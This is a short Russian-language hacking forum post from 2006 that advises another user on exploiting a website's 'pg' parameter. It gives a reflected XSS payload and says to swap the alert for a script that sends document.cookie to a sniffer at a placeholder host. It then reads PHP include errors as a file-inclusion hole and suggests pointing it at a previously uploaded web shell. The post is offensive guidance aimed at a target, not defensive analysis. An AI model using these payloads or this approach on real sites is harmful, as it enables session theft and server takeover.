19.02.2006, 21:43
|
|
Познающий
Регистрация: 09.09.2005
Сообщений: 90
Провел на форуме:
827197
Репутация:
22
|
|
Сообщение от Cnekmp
Нашел уязвимость. Выполняется JavaScript:
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>
Сообщение от Cnekmp
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)
|
|
|